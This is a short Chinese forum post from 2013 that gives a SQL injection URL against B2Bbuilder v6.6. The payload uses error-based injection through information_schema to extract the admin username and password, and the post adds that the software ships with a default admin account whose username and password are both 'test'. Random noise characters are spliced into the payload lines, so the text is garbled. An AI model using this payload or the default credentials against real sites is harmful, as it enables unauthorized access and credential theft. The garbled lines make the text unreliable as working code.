测试的程序版本为:B2Bbuilder_v6.6
+ Z& I! \1 w, T6 K/ I4 r8 S+ M, `5 `" S' h8 L- h2 a
8 i/ i! R, N- E+ z3 s, |' I. Uhttp://www.site.com/?m=offer& ... m%28select+count%28*%29%2Cconcat%28%28% v$ \; o7 o; f0 L
select+%28select+%28select+concat%280x27%2C0x7e%2Cb2bbuilder_admin.user,0x27,password
/ h( n+ _6 s: V/ U3 I5 K! G%2C0x27%2C0x7e%29+from+%60b2bbuilder%60.b2bbuilder_admin+Order+by+user+limit+0%2C1
7 B ~! l" ?& A& R9 S' ?1 L%29+%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%293 y" `% g+ s. z
*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D19 J+ [2 s/ K" u* V: N& _
4 |0 i" M& y9 C! Z; N, ^& p3 D这个B2B程序还有一个默认的管理员帐号,帐号密码都是test {$ M3 B$ J5 P5 e
. s. i1 i* F5 j0 s% E2 x4 A% X |
发表于 2013-7-26 12:44:48
收藏
支持
反对